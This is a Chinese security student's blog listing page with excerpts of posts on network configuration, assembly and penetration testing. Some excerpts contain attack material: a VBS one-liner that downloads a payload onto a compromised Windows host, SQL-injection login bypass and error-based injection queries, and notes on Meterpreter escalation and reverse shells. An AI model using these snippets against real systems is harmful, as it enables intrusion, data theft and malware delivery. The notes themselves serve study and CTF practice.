- 博客(101)
- 资源 (5)
- 问答 (1)
- 收藏
- 关注
原创 内网windows主机下载payload
当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload1、vbs#首先先向windows写入一个vbs脚本echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.resp
2020-07-29 21:43:23 651
原创 vmware-vmx.exe VMware Workstation VMX 进程杀不掉
昨天升级了windows到1909版本(本来一直都不想更新的,昨天需要安装一个软件,必须升级才能安装。)没想到今天vmware就出问题了,之前能打开的虚拟机现在打开黑屏无法加载,退出虚拟机发现有一个VMX进程始终在运行,cpu占用还很高,kill不掉。。具体原因不明,但因为版本升级之后,应该是老版本的虚拟机与1909版本windows的hyper-V冲突了。试了网上的方法,无果;最后只能靠重启。然后下载了新版本的vmware安装(激活码网上一大堆),问题解决。...
2020-07-28 21:43:47 1425
原创 CVE-2020-5902 F5 BIG-IP漏洞简单复现
写过一遍了,就不浪费时间再搬过来了:https://www.cnblogs.com/zw1sh/p/13276377.html
2020-07-10 17:19:19 579
原创 网络设备管理-cisco交换机
#####1、交换机基本配置以太网交换机工作在OSI参考模型的数据链路层,主要功能是提供网络数据包优化和转发交换机的连接方式有级联和堆叠终端访问安全配置:配置交换机ip,交换机所有端口默认属于vlan 1interface vlan 1ip address 192.168.1.4 255.255.255.0no sh配置控制台访问口令conf tline console 0exec-timeout 180password CCNAlogin配置telnetline vty
2020-05-13 17:23:18 640
原创 cisco交换机-简单配置生成树协议rstp和端口聚合
拓扑:1、为sw01、sw02、sw03设置生成树协议sw01(config)#spanning-tree mode rapid-pvstsw02(config)#spanning-tree mode rapid-pvstsw03(config)#spanning-tree mode rapid-pvst2、设置端口聚合(省略了一些无用的输出)1)sw01sw01(config)#...
2020-05-07 09:51:03 5170 1
原创 ms-settings是什么
ms-settings遇到了两个问题,记录一下1)windows桌面右键菜单–>显示设置或者个性化–>报错:ms-settings:personalization-background2)win10桌面右下角网络图标–>网络和internet设置点击无反应第二个问题是解决了第一个问题后发现也好了。首先是解决问题的方法,就是找到注册表里的计算机\HKEY_CURRENT_...
2020-05-04 20:18:56 8012 4
原创 MSSQL注入基础语句
MSSQL注入一、基础知识Mssql即SQL Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。1)常见的一些系统函数:User;User_name(); 系统用户db_name() 当前数据库的名字host_name 主机名@@version 数据库版本@@servername ...
2020-04-23 14:14:02 640
原创 内网渗透笔记1------(域、用户组、抓去hash、端口转发...)
一台计算机要么属于工作组,要么属于域(1)工作组是MS 的概念,一般的普遍称谓是对等网。工作组通常是一个由不多于10 台计算机组成的逻辑集合工作组实现的是分散的管理模式,每一台计算机都是独自自主的,用户账户和权限信息保存在本机中,同时借助工作组来共享信息,共享信息的权限设置由每台计算机控制(2)域实现的是主/从管理模式,通过一台域控制器来集中管理域内用户帐号和权限,帐号信息保存在域控制器内,...
2020-04-16 11:47:03 353
原创 PIX防火墙配置命令---笔记1
1、静态路由Firewall(config)# route if_ name foreign_ network foreign_mask gateway [metric]可配置一个静态路由允许防火墙把管理流量发送到不在本地IP子网上的地址。在透明防火墙模式下不支持动态路由选择协议。远程网络可在名为if_name (如outside) 的防火墙接口上查找到,其网络地址为foreign_ net...
2020-04-11 16:08:08 1587
原创 cisco路由器和pix防火墙--kiwi日志服务器搭建配置-2
1、拓扑pix 的inside接口与日志服务器在同一个网段,用inside接口向日志服务器发送日志,kiwi日志服务器搭建在win server 2003上,c1桥接本地网卡2、配置R1R1#confConfiguring from terminal, memory, or network [terminal]?Enter configuration commands, one pe...
2020-04-10 13:49:43 432
原创 cisco路由器和pix防火墙日志--搭建kiwi日志服务器-1
搭建kiwi日志服务器-1先用路由器日志测试一下能否发送到日志服务器1、安装kiwi,直接一步到底。2、配置kiwi接收ciscosetup–>rules–>filter–>ip address、ip mask–>填入自己日志服务器所在ipaction–>display–>选择一个不是默认的显示窗口(这里配不配置的影响没有去实践,我觉得没影响,默认应该...
2020-04-09 12:18:37 514
原创 pix三接口配置
拓扑R1R1#conf tEnter configuration commands, one per line. End with CNTL/Z.R1(config)#int f0/0R1(config-if)#ip address 13.0.1.2 255.255.255.0R1(config-if)#no shR1(config-if)#*Mar 1 00:01:44.0...
2020-04-08 11:18:49 551
原创 MFC----编辑框控件
1、编辑框内允许多行输入,或者说是允许敲回车编辑框属性里将multiline设置为TRUE或者将Want Return设置为TRUE2、水平滚动条,垂直滚动条Horizontal Scroll 和Vertical Scroll3、//将变量内容同步到控件UpdateData(FALSE);//将控件内容同步到变量UpdateData(TRUE);//设置内容SetWindo...
2020-04-07 16:02:09 339
原创 Cisco-GNS3-pix防火墙三接口测试1
三接口测试前期因为ACL配置问题未完成三接口,现在简化一下拓扑和流程,先测试一下inside:13.0.1.0/24dmz:14.0.1.0/24 服务器14.0.1.2outside:15…0.1.0/24配置R1配置R1#conf tEnter configuration commands, one per line. End with CNTL/Z.R1(confi...
2020-04-04 10:26:36 607
原创 cisco-GNS3-pix防火墙基本配置实操(持续更新)
一、ASA和PIX基础配置1、ASA防火墙配置1、GNS配置因为使用的GNS3的版本可能不同,gns配置asa防火墙的步骤可能不同在低版本的gns中直接在qemu选项里可以直接配置,参考:https://blog.51cto.com/dldxzjr/1905682在高版本的gns中配置可以参考:https://wenku.baidu.com/view/8934accc48649b6648...
2020-04-01 19:25:36 4653
原创 GNS3----cisco路由器NAT配置
一、基础Cisco路由器配置中NAT的主要命令: 静态NAT: 1、指定NAT内部接口 在内网相应接口的接口配置模式下执行:ip nat inside 2、指定NAT外部接口 在外网相应接口的接口配置模式下执行:ip nat outside 3、在内部本地地址与内部全局地址之间建立静态地址转换关系: ip ...
2020-03-26 20:47:06 5219
原创 meterpreter后渗透阶段的基本操作(一)
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题1、shell里的中文乱码获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码解决方法:在输入shell之后,再输入chcp 650012、提权相关的问题getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、(提权方式:1、g...
2019-12-28 20:11:21 1554
原创 利用本地漏洞提升权限
环境:kali:192.168.43.131metasploitables2:192.168.43.132利用的是meta2上的distccd服务的漏洞,以下将metaspolitables2简称为tb2步骤:1、先用nmap扫一下td2的端口(服务):nmap -p- 192.168.43.1322、发现distccd服务,打开msf,搜一下有没有该服务的漏洞利用程序:msf...
2019-12-06 22:52:13 606
原创 配置windows2012域控环境,并抓取用户的哈希密码和配置域用户windows自动更新
配置windows2012域控环境,并抓取用户的哈希密码实际步骤在下面的博客写的很清楚了,我就不再重复了https://www.jianshu.com/p/2708f3dfb7cf但有个问题可能会碰到:当使用server2012和win7搭建域控环境时,每次将server2012升级为域控制器之后,就ping不通win7(作为域用户存在)了,报错“一般故障”,查了很多资料都没解决(防火墙、...
2019-12-06 22:00:13 594
原创 kali-信息搜集工具(命令)
kali-信息搜集工具(命令)1、whoisWHOIS是一个标准的互联网协议,可用于搜集网络注册、注册域名、IP地址和自治系统的信息例:whois baidu.com更多参数参考帮助文档:whois --help2、host向DNS服务器查询主机的ip地址,默认使用/etc/resolv.conf里的DNS服务器;也可在指令尾部直接添加DNS服务器默认情况下hos...
2019-11-23 20:57:36 4386
转载 汇编-Irvine32.inc库总结
1. 堆栈操作1). 运行时栈PUSH 操作作用:32位PUSH操作将堆栈指针递减4并将值复制到该位置堆栈指针指向的堆栈PUSH操作.pngPOP 操作作用:POP操作从栈中移除一个数据, 数据移除之后, 栈指针增加指向更高的堆栈位置POP操作.png2). PUSH 和 POP 指令PUSH 指令PUSH指令将ESP地址减小并且源操作数到栈中...
2019-11-20 22:20:39 3409
原创 初识mysqli
前提:java里的类新建实例也是使用new,php也是;访问成员或方法,也是用"->"1、在php5.0之后,既可以使用mysql函数进行数据库操作,也可以使用新增加的mysqli()2、mysqli被封装到一个类中,其执行速度更快3、如果要使用mysqli函数,需要将php.ini文件中的配置项:;extension=php_mysqli.dll打开(即去掉注释)4、mysql...
2019-11-19 20:21:45 1078
转载 mysql 快速复制数据库(在一个新数据库里建立与原数据库一样的表和数据)
假设已经存在的数据库名字叫db1,想要复制一份,命名为newdb。步骤如下:1、 首先创建新的数据库newdbmysql-u root -ppasswordmysql>CREATEDATABASEnewdbDEFAULT CHARACTER SET UTF8 COLLATE UTF8_GENERAL_CI;2、 使用mysqldump及mysql的命令组合,一次性完成...
2019-11-16 21:47:21 1652
原创 汇编语言-怎样查看标志位、怎样生成列表文件、列表文件格式
2019/10/11加法减法,标志位:;加法减法.386.model flat,stdcall.stack 4096ExitProcess proto,dwExitCode:dword.dataRval SDWORD ?Xval SDWORD 24Yval SDWORD 40Zval SDWORD 50.codemain PROC ;INC和DEC mov ax,1...
2019-10-11 23:49:10 3416
原创 汇编语言——基础知识(1)
1、什么是汇编器和链接器?汇编器(assembler)是一种工具程序,用于将汇编语言源程序转换为机器语言。链接器(linker)也是一种工具程序,它把汇编器生成的单个文件组合为一个可执行程序。还有一个相关的工具,称为调试器(debugger),使程序员可以在程序运行时,单步执行程序并检查寄存器和内存状态。2、 MASM 能创建哪些类型的程序? 32 位保护模式(32-Bit Protect...
2019-10-10 22:57:04 981
原创 http请求详解
http是用于从万维网即web服务器传输超文本到本地浏览器的传送协议http是一个基于TCP/IP通信协议来传递数据;http默认端口号为80,但是可以修改为其他端口##HTTP请求报文格式分为三个部分,请求行、请求头和请求体请求行(Request Line)分为三个部分:请求方法、请求地址 和 协议及版本,以CRLF(\r\n)结束。URL 是统一资源定位符,它代表了 Web 资源的...
2019-09-29 20:33:41 541
原创 picoCTF2018 Writeup之Web Exploitation
My New Website打开发现是个登录界面,随便输入账号密码登陆成功,然后发现cookie里面有个admin字段为false,改为True(一定要大写)得到flag:picoCTF{l0g1ns_ar3nt_r34l_92020990}Irish Name Repo没有任何过滤的注入,直接到/admin登录页面,使用万能密码admin' or '1'='1登录即可my r...
2019-09-16 22:31:44 1767
转载 Linux下几种常见的反弹shell方式
Linux下几种常见的反弹shell方式最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。bash一句话命令详解以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。什么是反弹shell?简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是...
2019-09-12 22:13:20 2273
原创 报错注入总结
1、floor()收集数据库信息:user()、database()....select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);爆表:select * fr...
2019-09-03 18:59:40 382
原创 Centos7.4搭建ftp
Centos7.4搭建ftp1、查看是否安装了vsftpdrpm -qa | grep vsftpd没有安装则安装vsftpdyum -y install vsftpd2、启动、停止vsftpd服务systemctl start vsftpd #启动服务systemctl stop vsftpd #停止服务systemctl restart vsftpd #重启服务...
2019-08-27 14:01:57 348
原创 命令注入
command_injecttion参考文章:https://www.freebuf.com/column/146503.htmlCommand Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。命令...
2019-08-26 21:42:06 1627
转载 Centos7.3 上安装docker
Docker从1.13版本之后采用时间线的方式作为版本号,分为社区版CE和企业版EE。社区版是免费提供给个人开发者和小型团体使用的,企业版会提供额外的收费服务,比如经过官方测试认证过的基础设施、容器、插件等。社区版按照stable和edge两种方式发布,每个季度更新stable版本,如17.06,17.09;每个月份更新edge版本,如17.09,17.10。一、安装docker...
2019-08-22 22:38:36 820
转载 序列化与反序列化(以PHP为例)
1、什么是序列化序列化说通俗点就是把一个对象变成可以传输的字符串。1、举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过array序列化而来的。而反序列化就是把那串可以传输的字符串再变回对象。<?php //json序列化,json_encode(),json_decode()$book=array("book1"=>"web安全","book2...
2019-08-13 13:27:07 322
原创 文件包含总结(部分)
一、文件包含是什么?文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 攻击...
2019-07-15 10:57:30 1118
原创 SQL注入总结(部分,持续更新)
SQL注入暑假无聊,想着整理一下学过的知识,总结一下常见的知识点,濒危下一步的学习打下基础,这是系列第一篇:SQL注入1、SQL注入原理SQL注入是因为过于信任用户,未对用户的输入进行过滤,攻击者可以通过将恶意的Sql查询或添加语句插入到应用的输入参数中,再在后台Sql服务器上解析执行,进行攻击2、SQL注入流程1、判断注入点及注入类型:粗略型:提交单引号’逻辑型(数字型注入):an...
2019-07-12 20:47:06 343
转载 webshell函数回调
目录经典一句话利用简单的拼接字符串利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)利用 array_filter+base64_decode2.利用array_map+base64_decode3.利用uasort+base64_decode4.利用array_walk+preg_replace5.利用array_walk_recursive+preg_rep...
2019-07-02 11:47:45 2166
原创 由cve-2019-9766引出的缓冲区漏洞学习
通过工程实践引出的缓冲区溢出,缓冲区溢出缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。1、栈的结构1、先进后出。2、在内存中表现为从高地址往低地址增长。3、栈顶:栈的最上方(低地址区)。4、栈低:栈的最下方(高地址区)。基本的进程地址空间分布:2、基本栈溢出:缓冲区溢出示意图:如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
2019-06-25 19:11:29 1617 2
原创 upload-labs上传漏洞靶场(pass1-10)
pass 1上传文件发现会弹窗提示然后直接f12找到上传按钮所在的代码,将onsubmint事件删除即可pass 2发现上传时提示我们文件不允许上传,猜测是服务器端对文件的mime类型进行了验证直接抓包修改mime类型为image/jpg,即可上传成功pass 3不允许上传.asp,.aspx,.php,.jsp后缀文件,但是可以上传其他任意后缀.php .phtml .phps...
2019-06-23 21:51:17 1749
原创 DVWA-----CSRF
CSRF什么是csrfCSRF 即 Cross Site Request Forgery 中文是跨站点请求伪造1、攻击者在用户已经登录了目标网站后,诱使用户访问一个攻击页面(在同一个浏览器),利用目标网站已经建立了对用户的信任,以用户身份在攻击页面对目标网站发出伪造的用户操作的请求,达到攻击的目的参考链接;1 浅谈csrf的攻击方式2、产生原因CSRF攻击是源于Web的隐式身份验证机制...
2019-06-21 14:31:11 274
原创 floor报错注入总结
floor报错注入总结floor报错注入总结:这里其实是二次查询注入这里在利用相关函数时,使用了两次select查询公式:?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(测试语句))a from information_schema.tables group by a)b查看当...
2019-06-04 22:11:22 1532
求写一个小程序,关于一个小函数
2017-12-05
TA创建的收藏夹 TA关注的收藏夹
TA关注的人